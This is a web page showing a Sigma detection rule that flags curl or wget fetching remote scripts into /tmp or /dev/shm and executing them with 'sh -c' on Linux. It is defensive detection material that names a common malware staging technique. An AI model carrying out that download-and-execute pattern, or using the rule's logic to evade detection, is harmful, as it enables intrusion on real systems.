Suspicious Download and Execute Pattern via Curl/Wget
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
Sigma rule (View on GitHub)
1title: Suspicious Download and Execute Pattern via Curl/Wget
2id: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
3status: experimental
4description: |
5 Detects suspicious use of command-line tools such as curl or wget to download remote
6 content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
7 immediate execution, indicating potential malicious activity. This pattern is commonly used
8 by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
9references:
10 - https://gtfobins.github.io/gtfobins/wget/
11 - https://gtfobins.github.io/gtfobins/curl/
12author: Aayush Gupta
13date: 2025-06-17
14tags:
15 - attack.execution
16 - attack.t1059.004
17 - attack.t1203
18logsource:
19 category: process_creation
20 product: linux
21detection:
22 selection_downloader:
23 CommandLine|contains:
24 - '/curl'
25 - '/wget'
26 selection_tmp:
27 CommandLine|contains:
28 - '/tmp/'
29 - '/dev/shm/'
30 selection_executor:
31 CommandLine|contains: 'sh -c'
32 condition: all of selection_*
33falsepositives:
34 - System update scripts using temporary files
35 - Installer scripts or automated provisioning tools
36level: high
References
Related rules
- Antivirus Exploitation Framework Detection
- Potential Abuse of Linux Magic System Request Key
- Potential Exploitation of CVE-2025-4427/4428 Ivanti EPMM Pre-Auth RCE
- Potentially Suspicious Child Process of KeyScrambler.exe
- Suspicious Invocation of Shell via Rsync